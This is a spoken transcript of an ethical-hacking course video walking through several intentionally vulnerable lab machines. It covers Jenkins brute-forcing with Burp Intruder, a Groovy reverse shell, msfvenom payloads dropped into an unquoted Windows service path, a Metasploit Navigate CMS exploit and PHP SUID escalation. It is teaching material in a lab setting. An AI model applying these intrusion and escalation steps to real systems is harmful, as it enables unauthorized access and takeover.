we can go cd to root ls cat out our flag congrats on rooting this box and that's it so hopefully that was informative for you this was a little bit on the i would say easier side of the machines we're trying to go in order of difficulty uh this one is something that you you get a few different options for you it shows you how to mount it shows you how to enumerate multiple web directories and really tie a bunch of information together which is nice and then you get to see a classic pseudo no password escalation this time using zip but if you see in the gtfo bins when we went back and just highlighted sudo there are a lot of escalations if pseudo privileges are enabled in order to get into to go from low level to root so it's quite fun and quite common by the way so that's it for this video i will go ahead and see you in the next one on to the next machine which is butler now butler was created by joe helly aka the mayor thank you so much joe for creating this machine for us and this machine is going to be a windows based machine that is going to allow us to explore privilege escalation since when we first used blue blue went right to root for us so this one's going to give us some experience with privilege escalation now i have this accounts.txt file open just to show you that the administrator password for this one's a little bit different than the other windows machine this file is included in your your download so if you downloaded this you've installed it you should have found the accounts that way you can go and get the ip address that was pulled from this machine so with that out of the way i went ahead and ran nmap again similar process now here we have 7680 open and 8080 open i'm going to go ahead and you can ignore that for now i'm going to go ahead and go out to the website 168 138.138 and we're gonna see if it would help if i put 8080 on the end of it we're gonna see what's there okay all that's here is a a login page for jenkins um so we don't we don't have much here yet there are a few things that we can do here we can try to do some brute forcing we can look for directory busting we could try to do a view page source real quick and see if there's any information in here that might indicate what version we're running on and see if there's anything in here that we can get maybe an exploit off of and really there's not going to be much we could go to google and do a quick jenkins exploit and see if we can find any sort of jenkins exploits and there's this here about attacking jenkins there's one here about attacking jenkins this one has remote code execution um and we've got to click through these and see what we're looking at for this uh so it looks like 2015 jenkins has some deserialization attacks uh 2018 had authentication bypassing and it looks like let's see we've got uh check script remote code execution there's a lot of different uh looks like attacks in here there's some password spraying that you can do against this which we'll talk about here in a minute dumping secrets groovy scripts uh reverse shells with groovy okay so there's quite a bit in here this one is a little bit let's see if it's the same or not this is saying hey here's how you get code execution there's three ways to get code execution which ideally we want code execution we could do some brute forcing here but i'm going to show you a way to do brute forcing without having to do this um we can do some remote code execution and it shows hey there's a few different ways to do it in this instance we're going to need authentication there's no way around this for using jenkins we need authentication to get in here so it's uh it's pretty neat they show you a few different ways to get this exploit and everything's pointing back to groovy or it looks like there's a powershell way of doing it which is neat this article here tells you hey when you're logged in you can log in and it shows you how to attack this this looks a little bit older so there are ways around this and we can do we could do some research into this to see okay how do we exploit how do we exploit jenkins um all signs so far are really pointing to authenticated attacks there are some here that are older that looks like they're bypassing authentication just to save time and skip ahead we're going to go ahead and avoid those though it's not out of their own possibility that you explore those go down these rabbit holes check it out see if there's any sort of attack that you can exploit here so our main focus is how do we log into this application we haven't found any sort of version information which is unfortunate the other thing that we can do is we can go to google and we could say jenkins default password and it says the default password is admin password which is what's created the very very first time you log in i think it asks you to change it once you log in though i am not 100 confident on that and we can come in here and try admin password and we're gonna see that doesn't work unfortunately we don't have default credentials here so uh we do have we have the possibility of doing some brute force directory busting on this maybe there's a configuration file or something sitting on the back end that we can get access to i'm going to tell you just to save time that is not the case though if you're thinking through that methodology or that mindset that's fine i think that's okay the other option is this port here this 7680 we could try connecting to this you can use netcat you can use telnet there's options here where you can try for example you could try tell netting but you could do app install telnet because it doesn't come by default anymore and then you would just go telnet ip address 138138 and then that port number which would be 7680 and you can see what's listening on there this is a odd port it's trying it's not connecting it's one of those weird ones that you don't really see that often and i'm telling you from my experience i don't see that often you can go out and google hey what does this port do you could also go and say hey i know this port's open so i'm gonna go ahead and just try 7680 here that's going to stall out it's not a web address either so we're running out of options on how to actually connect to that that could be a false positive that it came back on as well we're not sure because we're not getting any actual connection into that machine so with that being said we need to brute force jenkins now you saw metasploit had a module somebody showed that in one of these we're going to do it the burp suite methods that's my favorite go-to and i'll show you the burp suite method if you want to play around with some of these other methods like that's shown in here sorry i'll make this bigger but that's shown in here feel free to go use this and metasploit and see if you can you can brute force passwords usernames etc but from here what we're going to do is we're going to use burp sweep so i'm going to use a tool called foxy proxy since we're in 2021 i'm going to go ahead and show you how to install this just to get this up and running if you just type in foxy proxy literally go the first link you get with standard go in here hit install mine's already installed so it's going to ask me to remove it all you gotta do is install it it should show up right here in the corner little fox okay you go to options for your first time setting it up and in here all you want to do is hit add and then i'm going to cancel this let's edit this so you can see what my settings are i just named it burp 127001 our localhost and our port of 8080. what this does is we use burp suite once in the course and we had to go in and change our settings and our preferences and come in here this just does it for us automatically with like the flip of the switch so when we open up burp suite let's go ahead and do that you can just type in burp up at the top and open up burp suite so we're going to use this proxy right we're going to proxy through this i'm going to cancel any requests for updates we're just going to use what's in here this is 2021 2.1 which is new enough for me um i've made my font size really big so yours might look a little bit different this is just for video recording purposes but in here we have a proxy okay this is what we're gonna be listening on we're intercepting some traffic we showed this a little bit in the last uh the enumeration section but here you can see one two seven zero zero one eighty eighty is where the traffic is flowing through and i'm gonna go ahead and intercept traffic so like i'm going to come in here and i'm going to say admin password on this attempt which i know is not going to work but we have the traffic now intercepted hopefully in our burp suite um maybe if i actually turned on this would work uh let's try admin password hit enter okay now it comes up so you can see the request comes through in this inspector um we're getting a post request we're trying to pass this password through admin password sign in form okay what i'm going to do is we can send this to repeater i'll send it to repeater first then i'm going to send this to intruder so just right click you can do control r control i both work control r to send a repeater control i to send to intruder but in this instance we can just push this request hit send and this will just say hey 302 found you can follow the redirection it's going to say 401 unauthorized all right so that's one thing we could see in here that the set cookie comes remember me equals and there's nothing in here so that could be something to look forward to a little bit later but what we want to do is we want to come in and we could technically brute force we could be like password password one go send that one and keep coming through until we can find file redirection and find an actual login doing this with repeater will take forever good thing is we have something called intruder so if you come in here and you go into the positions tab right here go ahead and hit clear what we're going to do is set a couple of positions we're going to come in here and we're going to say okay admin i see you i'm going to go ahead and say add double click on admin hit add double click on password hit add we are basically setting up our parameters or our variables that we're going to use so we're going to perform an attack where we give user names and we give passwords and it's going to try those in combination so really when we use multiple facets here we're either going to be using pitchfork or cluster bomb so pitchfork is great for what is uh credential stuffing which we're going to be trying hey i know this user has this password so we'll say uh admin has the password or password and we may have found that in a breach okay so we'll try admin to password and then we'll try next user with that password so it's one to one now battering or sorry cluster bomb is i'm going to try every single user with every single password in the list so if i've got five users and 10 different passwords that's going to be 50 different attempts because it's going to try user 1 with all 10 passwords user 2 with all 10 passwords and so forth so we're going to use a cluster bomb attack because we have no idea what the username or the password is now in order to save time i'm going to just type in a few different payloads here realistically we would guess some different usernames that would go in here like for example admin administrator jenkins okay if we knew like an it person or somebody who might be running this we might put in their name but in this instance we might just want to run with these three and then on a bad password list we might just go copy like the worst 100 passwords or worse 500 passwords and then just hit paste and paste it in here in this instance i'm going to type out some bad passwords so maybe password um jenkins how about password with a capital p jenkins with a capital j okay um you know something like password1 etc now we have three different users five different passwords fifteen different attacks three times five is fifteen so we're going to try admin first with all these passwords then it's gonna go through and try administrator with all these passwords then it's going to try jenkins with all these passwords okay so we're going to hit start attack and what's going to happen is it's going to start pushing through and we have to be very cognizant and watch this and watch for any sort of changes that might happen in this okay it's very very subtle okay when we're looking through this if there's a status change sometimes these will go like 401 or we could follow the redirection in the settings by the way we could select that there's also advanced stuff that we'll get into with like we can use grep to look for different changes in here um we'll talk about that a little bit later but we also cover that in the external pentas playbook course because that is something that we do when we're doing password spraying attacks here in this instance we are looking for subtle changes like the length that is here if you notice everything's 302 so there's no difference in status changes there's no difference in like error codes or anything what we're seeing though is 318 318 318 318. all of a sudden there's a 314 on jenkins jenkins what changes here what is the response that changes compared to this okay here we get a j session id cookie where here before we did not have that here we get a cookie and then what changes here we already have a j session id cookie and we're getting a login error because we have more data that we're storing in here we're already authenticated so now it's gone from 318 down to 314 for this one request into a bunch of 408s to 409 range so this one small tiny little request here this little length difference could be the indicator that there's something different so you have to really scroll through this use your eagle eyes and make sure that you are looking through this with a fine-tooth comb here i am seeing jenkins jenkins as a valid login and we're gonna go attempt that i'm gonna turn this off we're gonna go attempt to log in with jenkins jenkins and hopefully we get in okay we do get in so from here we do have the ability to run code execution uh let's see what they say so we need to find a place to execute this code this is okay i've seen better write-ups on this so going around and doing some research you will find places to to execute code in here if you go into manage jenkins there should be a bunch of different tools that are in here um scrolling through there is a command line here that you can run from a shell which seems pretty interesting it's just getting into a shell on this machine from a script there's also a script console here okay the script console is interesting because it's in groovy we've seen groovy a few times you might even type something like jenkins script console um exploit something like that and you can see exploiting jenkins groovy script console in multiple ways so this is somebody that came in here and did this um another thing that you can just read through and see they're using metasploit we can use manual methodology which is right here there's a github reverse shell which honestly if you just go to google and you just type in groovy reverse shell the first thing that comes up should be your ideal one which looks like that's the same one they had too but this is what i like to use you can come in here make this a little bit bigger you can just go raw copy this and then we'll paste it and we'll talk about it so copy that paste it in here so we need to utilize this for a reverse shell this is using command.exe to perform the reverse shell it's giving the port of 8044. you can choose whatever port you want here but i'm going to keep it the same why not keep it simple okay so i'm going to make this bigger netcat mvlp 8044. we'll set up a listener on here we have localhost we're not running localhost okay we're going to give it 192.168.138.131 or whatever your attacker ip is so whatever your ip of your kali linux machine is this is what you want to get so this is just a reverse shell all it's is written in is groovy instead of the other ways that you've seen it so far so it's going to reach out to us on this port and when it reaches out to us it's going to execute command.exe here's the whole process of that code all we have to do is execute this which i might need to make this a little bit smaller to actually see that let's see we'll just go all the way over the right and i'll just run this okay and it's stalling which is usually a good sign meaning that we are likely getting in and we do have a shell here so we are now who am i we are now butler on butler we are not system we're not authority system so we need to take this a little bit further and see if we can elevate privileges now there are several tools and methods that we can utilize we are going to look at a classic form of privilege escalation on this machine if i were going through this machine the first thing that i would do is i'd look at system info i would want to know what machine this is what the build is you can see we're running on windows 10 if this was running on an older edition this is a windows 10 enterprise which is nice we're running on windows 10 so the chances of there being an exploit for this build may be pretty low i would look at this build see if there's anything there that we can use or abuse in order to get escalation um but the intended path on this as of right now is a different method so we're going to look through that and i'm going to show you kind of the basic enumeration process that we can use again if you're curious of seeing this in way more detail you are welcome to join us in the windows privilege escalation course and go through this a little bit more so with that out of the way there is a tool out there called win peas so i'm going to go back i'm kind of already cheating and going ahead because i downloaded this earlier but if you search windpeas remember lynn p's this is the windows version of lin p's so just go to the first thing that you see now in here if you scroll down a little bit they have the different they'll have different downloads so we can go into the exe here win peas exe and you'll see an sln we don't want the sln we just want to be able to download the latest so go into download the latest version we're not going to compile this we're just gonna trust what they've got so come in here download windpeas x64.exe right here all right i'm going to i'll say okay on this because i want to show you again what i do if you come into root and you open a new tab make sure you move this so i moved i don't know if i actually downloaded it let's see um win peace i didn't download it but i moved win piece whatever it's called wimpy is 64. make sure you do that move that into your transfer folder or ensure that you're going to have it where you where you want to host it i actually just moved it and i renamed it windpeas.exe because it's a lot easier to just type that out on a machine and so a little bit keeping it simple so with that i'm going to go ahead and just do this which is python3 dash m for module http dot server and port 80. so we're going to host up this transfer folder in here i'm going to go ahead and go to my shell and i want to go to my user folder or somewhere that i can write it looks like i'm in the jenkins folder but i like to go first of all cdc user okay actually cdc users do a dur in here butler should have read access or read write access so we're going to go there first um what we might do too is see if there's anything in here like we might we might look at like the well he's got some downloads in the downloads folder it looks like an indicator in here is looking at the different times sometimes when you're doing these ctf machines like what was the last time this is updated so there might be something in the downloads folder that could be of interest like cd downloads go dur real quick uh looks like wise care 365 was installed who knows what that is that could be something of value to us later but that is not um that is that is information it's just not exactly what we're looking for at this exact second we can go around maybe cd to the desktop see if there's anything there nothing there either okay so we just want to be able to put a file somewhere that's writable so i'm going to put i'm going to put win peace here in butler's folder just his base folder here for his user and all we're going to do is use a tool called cert util to transfer this over so certutil.exe we're going to do a dash url cache like this dash f for file and then we're going to grab the 192.168.138.131 slash winbees we're going to call it wind peas okay we should do a dir and it should exist right here so you need a second catch up go ahead and catch up otherwise we're going to go ahead and move on so now we just run wimpeez.exe and special note yours might not be in color you can run this reg add command or should be able to run this i'm not sure as a lower level user actually so you might have to suffer through the first time with seeing it not in color but just follow along on my screen if you can't run this reg ad but you're going to have to run this and then run this again otherwise we're just going to kind of scroll through this and see this is similar to what we saw with lin p's red means something we want to look at and kind of scroll through okay so we're just going to scroll through this there's a lot of output on this machine i'm looking for anything that quickly stands out for me these protection enabled they really don't matter to me at this moment i'm looking for something that might just like hey this immediately stands out so um it's giving us drive information most of this is just disk enumeration at this point nothing of value so far it's looking up printers tell us printers is looking up named pipes which is fine i'm going through this is telling us explicit credential events which these are plain text credentials if we have them i'm not seeing anything here so we'll scroll through these keep going [Music] printing account log on events these are just events again so um win peace has gotten beefier over the years it used to be pretty quick to scroll through i'm gonna actually cheat a little bit and scroll down uh powershell script blocks let's keep going here okay user's information it's telling us the users on this machine and again this is all different kinds of enumeration now the se impersonate privilege could be good for a potato attack but that's a different type of attack we're not looking for that at the moment but that could be something that's why it's highlighted in red something we do cover in the the escalation course so it's telling us more about user accounts that are on this machine any sort of rdp sessions that might exist any sort of folders heavy heavy heavy enumeration to scroll through okay we're in process information i'm going to skip past processes i'm not too concerned about what processes are running that could take a long time to scroll through when we're doing privilege escalation we are looking for quick wins so we got some service information um and in here there there are some okay there something does show up and this is all lighting up red so i'm looking and reading through here we have the ability to modify services like we have the ability to modify jenkins.exe perhaps we can modify that and write a shell code here and get a shell since we're running as this user but i'm not sure that that's going to run as as administrator it looks like file permissions here we'd have to be able to hijack that binary um so i'm going to scroll through again this is disabled we might be able to enable this uh vmware i don't ever attack i don't know if that's really truly an attack method even though it shows up a lot the other one that showed up that's interesting is here uh we have this wise boot assistance which was that wise care that we saw downloaded so that's of interest because we did see that downloaded we do see this running and what's weird is okay it's running it's auto running and it says no quotes and space detected it said you can modify this service all access file permission is run as administrator um that's very very interesting so let's talk about what we're seeing and i know this could be a little bit overwhelming because this is just kind of throwing um privilege escalation in your face from a windows perspective and that can get pretty messy pretty quick depending on what you're looking for what we're looking at here and why this is important is we are looking at a privilege escalation that will allow us to to get a system on this machine and this is called unquoted service paths i'm going to show you what this looks like on the windows machine but basically what's happening is the service executable that is here the service executable it is located in a path that is not enclosed in quotes okay so you see no quotes and there's a space detected so you see a space you see a space okay the issue here is that when we're running this when windows runs this and it looks for this service when you start the service up it's literally looking for every instance that exists before the space and it's trying to add exe so it first tries c program.exe then c program files.exe okay it keeps going on um here cys.exe or y's forward slash wise.exe wisecare.exe okay and what's happening is i think my machine might have just shut down on me i'm going to go ahead and turn this back on as i was going to show you um what's happening is we can take an executable malicious executable basically malware and we can upload it to this machine place it in one of these folders we don't have to overwrite this by the way not the boot time.exe we can literally just write something called wise.exe as long as we have permission to write into this folder we can do that and then we can run it and hopefully we can get a shell out of that because the system is going down and it's looking for wise.exe and when it finds it it will run that first and then it's going to we're going to attack it based on this so i want to show you really quick on the windows side of things of course i am locked out of the administrator account as well okay so what i've done in here is i've gone out and i've looked for this service in the reg edit you don't have to follow along but this is an hkey local machine system current control set services and then the wise boot assistant when we say unquoted service path if we look at this image path here there should be to prevent this attack from happening quotes around this there are not quotes around this so this is called an unquoted service path meaning we're not taking the literal path of this thus when we run c program files x86 wise all the way through for this boot time it's going to do those checks now i don't know if we have write permissions to the c program files folder as a user but we certainly should have write permissions here since we installed this it looks like as the user so if we have write permissions to this wise folder we can go ahead and just drop a file in there called wise.exe and it will try to run wise.exe in that folder okay so it'll go c program files wise wise.exe is going to exploit this situation here and hopefully we will get a shell out of this so let's go ahead and give this a try what i'm going to do is i'm going to scroll all the way down here and look at all this mess there's a lot now there are other tools that could easily identify this by the way like this tool is probably the most comprehensive and that's why i showed it to you but there are tools called power up which will do this there are exploit checkers that will do this there are other ways to run through machines like this and do escalation checks i'm showing you the most probably popular tool but it is the most comprehensive and it can be overwhelming so please don't feel overwhelmed you will with practice and over time learn how to decipher this read through it really fast and know kind of what you're looking for train your eyes for those things again this is just introductory ground level type stuff so what we want to do is we want to generate some malware i'm going to go ahead and stop sharing this folder real quick because i'm going to put malware into this so we're going to use msf venom and we're going to use this to generate some some shell code here okay so we're going to do a payload of windows x64 we're going to do a shell reverse tcp and if you wanted to do this with meta split you could do like interpreter go down that path etc for this instance we're going to use no metasploit we're just going to do this all manually we're going to give our listening host which is us 192.168.138.131 this is your attacker machine we're going to give a listening port i'm going to call this 7777 do a file type of executable and output of wise.exe you could also do this as wise.exe just like that all right so we're going to go drop this once it generates into the wise folder so i'm going to go ahead and put this back up as a transfer so my transfer folder is back up and running i'm also going to open a new tab and i'm going to netcat nvlp and we're going to listen on all sevens because that's where we said that this is going to work so we know this is 64-bit architecture we saw that by the way when we were running system info we saw that this is windows 10 64-bit architecture so this is all um all from our little bit of enumeration that we did going back to this machine we need to go ahead and get into that folder so that folder was in c so we're gonna cdc we're gonna go ahead and do a quick uh dur and it's easier for me to just copy like this and then do a cd paste like that get you in there cd into y's okay and now we're in the folder that we want to be in so if we type in dir we got wise care 365. so we're going to put ys in here it's going to try to run wise.exe and we should be good to go so we'll see how this works what we need to do is run cert util one more time same way we're going to use this to transfer a file over which is nice http just like this one nine two one six eight one three eight one three one forward slash wise.exe and we're gonna call this ys.exe just like that hopefully it comes over do a dir okay it's sitting in here that's great now the question is how do we run this if we just do a dot forward slash or if we just go y's dot exe don't hit enter if we do ys.exe that is going to run this as the regular user it's going to run it as butler you will pop a shell back here as butler and we will have gain no ground whatsoever so what we need to do is we need to stop the service that's running now the uh the service that's running is the wise boot assistant okay we can query that to find that out i'm just telling you how to do it just a little bit easier you can go google what the what the running service is called you could look through win peas and it'll tell you as well i'm just just guiding you along giving you a quick step ahead here so we're going to do a service stop on wise boot assistant it's all one word like this okay okay so it's saying stop pending it's going to go ahead and stop that we can do i believe sc query of wise boot assistant okay and you can see that this is stopped so now that it's stopped what we're gonna do is we're going to start it when we start it it's going to execute as the system it's going to run that shell code as system and hopefully we get a shell back as system so you see the shell came through we say who am i authority system and that is it so this is a very very classic absolutely classic way of exploiting a machine so looking through the print out of wind piece again there are other tools out there that do this there's actually even a check that will do this from a one-liner there are privilege escalation checklists and guides that you can go through so when you get on a machine you say hey i'm going to check this first then i'm going to check this next and you go through the checklist and make sure you leave no stone unturned you kind of get your low hanging fruit like you saw with the linux like we'll check history first because maybe there's a password stored in history then we'll check pseudo and see if we have any privileges and and kind of go down the easy list same thing with system info i want to see what the build is if i can recognize the build there's something there from trained eyes and then kind of just go down the list as to what we need to do running windpeas is something that we can execute fairly easy run through it same thing with powerup or other tools like that and we can go through and find issues like this and this one is a classic if you do any ctf machines i guarantee you will see this in the future so this is a good one to show you as an example and build you up into privilege escalation and get you kind of get your feet wet in the game so that's it for this machine we're going to go ahead and move on to the next one welcome to this box titled black pearl this box was created by alec and is a linux machine thank you alec for creating this machine we're going to go ahead and start off with our nmap scan as always if you haven't found your iap address go do that get your map scan going if you just want to follow and watch along and continue from here that's fine too now our nmap scan only shows us here with port 22 dns 53 and port 80. as discussed in the past 22 likely not the option so that really leaves us with 80 because 53 is likely not the option either though it does come into play a little bit now we can see we have a default web page here just by looking at the the title this nginx we have a welcome to nginx meaning if we go out to this website we go 192 168 138 130 uh and i turn off my proxy and refresh oops and refresh we get it welcome to nginx page so what do we need to do we probably need to fuzz this and see where we can get with this information so we're going to do a quick fuzz on this uh something else that's i think hidden in here let me view the page source it always helps to but define the page source in here you can see that there has been a little nice thing added in where it says alec at blackpearl.tcm so that's your webmaster let me make it a little bit bigger alec blackpearl.tcm this is a big hint giveaway something we haven't covered quite yet and we're just going to keep that in the back of our mind but we know that we need to access this web page we're going to go ahead and try to do some directory busting first and see if we can't get there with that so let's go ahead and take a look at the directory busting and then we'll go from there so new tab we're going to do fuff do dash w user share word list this should be starting to feel a little bit familiar right uh dur buster for me and then just tab through to get to the medium list and then go ahead and say fuzz and then we're just gonna do a dash u with the ip address for me it's 130 slash fuzz run that and see if we can't find anything and immediately we get something called secret so let's go ahead and go over to forward slash secret uh it's a file let's go ahead and save that let's uh open the containing folder and let's just open this if we can open up with mousepad and it said oh my god you got root just kidding search somewhere else directory busting won't give anything this message is here so that you don't waste time directory busting this particular website alec okay so what he's telling us is you're not going to find anything on this directory well we're likely not going to find anything hunting down port 22 we're likely i mean we could attack maybe alec at 22 with some weak passwords and see what we find but that's not the entry port and here we have 53 which means that this is running dns and it's running dns for a reason so we're going to do some recon on this what we're going to do is we're going to just say and i'm actually going to run it over here we're just going to use a tool called dns recon and we're going to say dash r and that is for our range of one two seven zero zero zero slash twenty four we're just scanning the local host because that's where our machine is and then we're going to provide the ip address of the box that we're actually looking for which is 130 and then for d you can literally type in whatever you want we just type in blah d is just needed there for a dictionary but we're not going to use it and it's still going to be able to find it if we take it out it won't work which i'll show you or d for domain i'm sorry not dictionary d for domain um it's we're providing a domain but it's gonna look for that domain but if we don't provide it it won't search so it requires the domain even though we don't have the domain or don't know the domain it's still able to find it so what it found was 127001 at blackpearl.tcm which means that there's dns pointer record here to this webpage we need to go ahead and add that to our dns and etsy hosts okay so we can do is just nano etsy hosts and in here you can see that we have our one two seven zero zero one for localhost and one two seven zero one one for cali we need to add in the ip address one six eight one three eight one thirty we're just creating a dns record here for black pearl so now we're going to say hey blackpearl.tcm allocates to this ip address and the dns is going to do its magic so we're going to control x hit y hit enter and then in your web browser go ahead and close it completely if you had one open and then we're going to go back open it up and hopefully this will work first go so http double dot slash blackpearl.tcm okay and if this happened correctly you should see this page okay if for some reason it did not load for you go ahead go back close this out again give it a second let it let it repopulate so here we are brought to this my info page now we have seen this before and again we can get some information disclosure here um we can see that we're up against the linux box we can see the name of the box debian system type there might be some sort of execution we can run against this but again when we're up against a directory like this we want to do some directory brute forcing and see if maybe we can get access to this machine or get access any further than what we are so we're just going to want to fuzz the directory one more time and see if that leads to anything as of right now this info page is giving us info yes but there might be more hiding under the covers so we're going to go ahead and go back and we're going to just use one more time uh user share wordless and i'm never going to get tired of saying that uh dirtbuster i can type and then do my tabby thing all right so we're going to fuzz here and then this time around we're going to do a dash u and we're going to do black pearl.tcm not the ip address black pearl and we're going to say fuzz okay and we're going to let this go through we're going to look for anything that might show up and immediately navigate shows up for us so that's interesting let's go ahead and just navigate to navigate shall we okay we've got navigate cms version 2.8 copyright 2021 and we're going to go ahead and just dig a little bit further into this so my go-to is always google just hey navigate cms we could look for exploit we could also look for default credentials if there are any see if we can go in there but look at this we've got unauthenticated remote code execution from exploit database we can run it manually or we can run it with metasploit so that's nice we have options so actually an exploit database is with metasploit as well i'm sure there is manual code out there but for this one since we haven't run metasploit really much in the capstone we're going to go ahead and mix it up and use a little bit of medisplay here otherwise i encourage you to go back and try this manually as well but we're going to go ahead and open up metasploit and see what it's got to offer for us so msf console let this load real quick and this gives us the module in here i mean we could search for it but it's easier to just like honestly just copy this and we should probably verify okay so this is tested against navigate cms 2.8 this module exploits insufficient sanitization in the database protect method and allows us to bypass all the k authentication the module then uses past reversal vulnerability uh that allows authenticated users to upload php files uh together we can get remote code execution so it's chaining attacks here first it's going and it's bypassing authentication it's then uploading um malware which uses a patch traversal vulnerability to do that via the authenticated user and then uses that to do remote execution so this is a a chained attack here this is pretty pretty unique so we're going to go ahead and go in here and just paste hopefully this works this is meta exploit 6 i'm on and it does okay so when we're in here we get to say options and we're asked for in our host we're asked for uh our port we have our our port we're asked for our lhost which is fine i think and then all we need is to just set that php interpreter reverse tcp looks good i think all we're going to do is just make sure we set our our our host here which is going to be 192 168 138 130 but we also need to set the server virtual host so we're going to say set vhost to blackpearl.tcm okay everything else looks good this is automatic target we could do a show targets real quick and see if there's any other targets there's not just automatic this is our attacker ip address that's fine all ports fine forward slash navigate as the target uri looks fine i always like to do options one more time just get the visual of it everything looks good to me so i'm gonna go ahead and just hit run cross my fingers hope and pray uh looks like we're getting an interpreter session back so let's hit enter might be rushing the process here a little bit we'll see if it works might take just a second to load okay and from here we have a shell so we can jump into a shell by typing shell and in here we don't see anything but if we do who am i you can see www.data which means we're going to have to do privilege escalation again now we are in this funky little area we don't see like a shell a normal shell type right we don't see like hey user at machine name so we need to generate a tty shell and there's easy way to do that if you go out to google tty shell if you just google that you'll see spawning a tty shell now my favorite method of doing this is using python but we need to have python on the machine so you'll see what this does here in a second but there's other ways to do it python's quick way if python is on the machine so what we're going to do is just say which python and you can see user bin python exists on this machine so that's where it's calling out we're going to go ahead and just copy this and i'm going to modify this a little bit i like bin bash over just sh so i'm going to open this up in a notepad or a text editor paste this in here add a ba in front of that for bash copy and then we're going to go paste this into this shell okay now that looks a little bit better now we have an actual shell here um so what we need to do is we need to again go through our privilege escalation capabilities in this instance running sudo-l we can try see what's there uh pseudo command not found um running history we could see if anything's there nothing great so we need to check for privilege escalation and we can do that using something like lynn p's right this should be familiar now we're going to do a print working directory i'm going to go ahead and cd over to temp because that's where i like to move things we are in temp and now what we're going to do is i'm just going to upload this this file so we're going to do a wget and i don't have it hosted yet but i'm just preparing it so 192 168 138 131 attacker ip address forward slash lin ps dot sh and then lin ps.sh this should be familiar now we're going to come in here and we're going to a control plus here we're going to go ahead and we're going to cd to transfer you should have one of these by now ls lin p should be in there so all we're going to do is python 3 dash m simple uh sorry http server i'm thinking my python 2 days and port 80. now we should be able to run this okay let's go ahead and let's see if it actually generated uh did i call out lymphese i did let's see ls limpese.sh so i'm going to go ahead and just chmod plus x linps.sh forward slash linps.sh okay now that's going gonna run so let's let this run for a second i'm gonna pause the video let it run through and then we're gonna come back and look at the results okay so the results have come back and we're gonna look at it from the bottom up this time only because last time we took it from top down we're gonna go bottom up the top section is really very system heavy and what users are there and it's a lot of good information but at the same time we can kind of just skip down to the bottom and scroll up like here we're looking for usernames or passwords that might exist and we're just kind of going through and trying to see if there's anything in here where we could find that would be relevant remember we're looking for red and we're looking for red yellow specifically that would be good i'm going to skip over some of this and i'm looking for in particular some different things now if there's any sort of password or credential here that could be interesting if there's like a file name password or password credential and you kind of learn what these are you're really looking for something to stand out none of these really stand out these are all common kind of just paths on the system and common files on the system now if we keep scrolling up what i'm looking for are any sort of interesting writable files like here uh run php run lock but there's like we need to be able to have something that we can abuse the feature of it has to be more than just writable so again this is providing information but it's not always um going to be one specific thing now backup could be interesting like there's backup files it looks like this is specifically to the var www navigate there could be information in this backup folder like there could be perhaps like passwords or something in here so this could be an area where we might want to look at just because there might be a password for a user that user might be the root account password we have no idea so we kind of want to look at that we do want to know what other users are on this computer so starting at the top is not a bad idea we could also just cap the etsy password file and see what's going on there in this instance we see root we see www dash data there might be more users we're not sure quite yet keep scrolling up let's see if there's anything in here capabilities could be a possibility for us to look through we'd have to look at gtfo bins and see this is something that's a little bit beyond the scope of this course but it is covered in the prives courses and we're gonna keep scrolling up and this is where this gets a little bit interesting um especially when i start seeing unknown suid binaries uh so let's talk through the suid and the the sticky bits and all that good stuff real quick um so this is actually a great example so we're looking in here and we have uh what is called an suid set now if you remember or recall from our early linux lessons we have file permissions we have read write execute let's go down a little bit like right here read write execute this is the root setting okay this is the owner setting i should say owner of the file this is the setting uh read blank s okay this is actually sgid uh this is okay let's pretend this says let's pretend this says uh execute like this right here read blank execute so this is the group setting anybody belonging to this group has read and execute permissions they do not have right permissions anybody in this one okay this is global this is uh read execute again so we see here who's the owner of the file when we're looking at all of these we see root owns all of these different binaries here okay now let's talk about su id you see instead of read write execute we have read write s okay s is our suid this means that we can run this and whenever we run this here we have the ability to run this as the user that owns it this is a and the suid we're on the root here or the owner sorry we're on the owner so we can run this as the person that owns it which is root now you see down here what is called an sgid which means we can run as the group and that's sticky right here or it's an s right here i keep calling it sticky sticky bit is when it's in this when you see an s in this area right here for everybody else that's called the sticky bit here's sgid and in this group setting it's an suid when we look at suid it's very interesting because we have root ownership we can run this binary as root and abuse that feature now there is a quick way to do this and i can show you how the script is running this but this is really just looking for permission settings so we can come through and look and if you ever go through a a checklist you'll see something like this where it's just doing a quick find command and it's looking to see if it can find the permission settings on these okay so permission is going to be four zero zero zero and this is looking specifically for that su id and we're just going to put this to dev null here and now you find all these in a much cleaner setting so from our perspective what we want to do is look at this because not having the suid enabled does not necessarily make it vulnerable but we have a great website that we looked at earlier gtfo bins okay.github.io and we can do something like this we can come in here and say okay we've got suid and then maybe we want to start looking through some of these like maybe like i don't know mount for example if we can come through see if mount's in here mount but i'm looking right here not there um this new grp not there php is there even though it's 7.3 php is there so maybe we want to open that like uh switch user su i don't see it in here and you would just go through this list and say okay does anything on this list stand out as as being a privilege escalation now you are not expected to remember all these there are some that you will see and it will stand out because you've done it time and time again but for this situation this is absolutely what the gtfo bins is built for so we can scroll down over to suid and click on it and it says if the binary has the suid bit set it does not drop the elevated privileges it may be abused to access the file system escalate or maintain privilege as a suid backdoor okay if it is used to run sh-p omit the dash p argument on systems like debian that allow the default sh shell to run so it's giving us some instruction here okay so all we need to do on this is we just need to run the php and we need to run it with this rest of the setting here okay that's that's really it and we're going to call out that binary specifically so you copy this come back in here we see the binary is sitting in user bin php 7.3 and it shouldn't matter that's php 7.3 just paste the selection okay this is going to execute bin sh as the root user giving us hopefully a root shell which it gives us the euid of root okay which means even though it says we are uid of wwe data and a group id of wwe data look at this euid what we can do with this is cd2 root ls catflag.txt we are staying as the root user but we're running in a shell that is executed by root okay so it's a good job on this one finding the domain name may have been a little guessy but the goal this box is to teach about virtual host routing which is used a lot on cts which is true so and proof of concept here is you should be able to cap the etsy shadow file okay prior to this we would not have been able to do that doesn't matter that when we write who am i oh we're actually showing as root but our id is still staying as wwe data okay but we are executing as root right now so keep that in mind we are the root user we have owned this machine as the root user um and that's it so suid is a new lesson for you again if you like this concept of privilege escalation we are scratching the surface there's so much to learn there's always new tips and techniques out there i encourage you if you're interested in the ctf path again to check out the escalation courses if not we're going to start moving into exploit development we're going to start moving into some of the other stuff that's out there with the active directory pen testing and get more into the realistic stuff so this is good foundational lessons but i look forward to seeing you in the next video well everybody that is it for this course i really hope you enjoyed it if you did please do consider purchasing the other half of the course the practical ethical hacking course that is on our academy website tell a friend have them come through this as well again subscribe if you haven't for more great hacking content and i hope to see you again in another video very very soon again my name has been heath adams aka the cyber mentor and i have really enjoyed having you in this class until next time peace out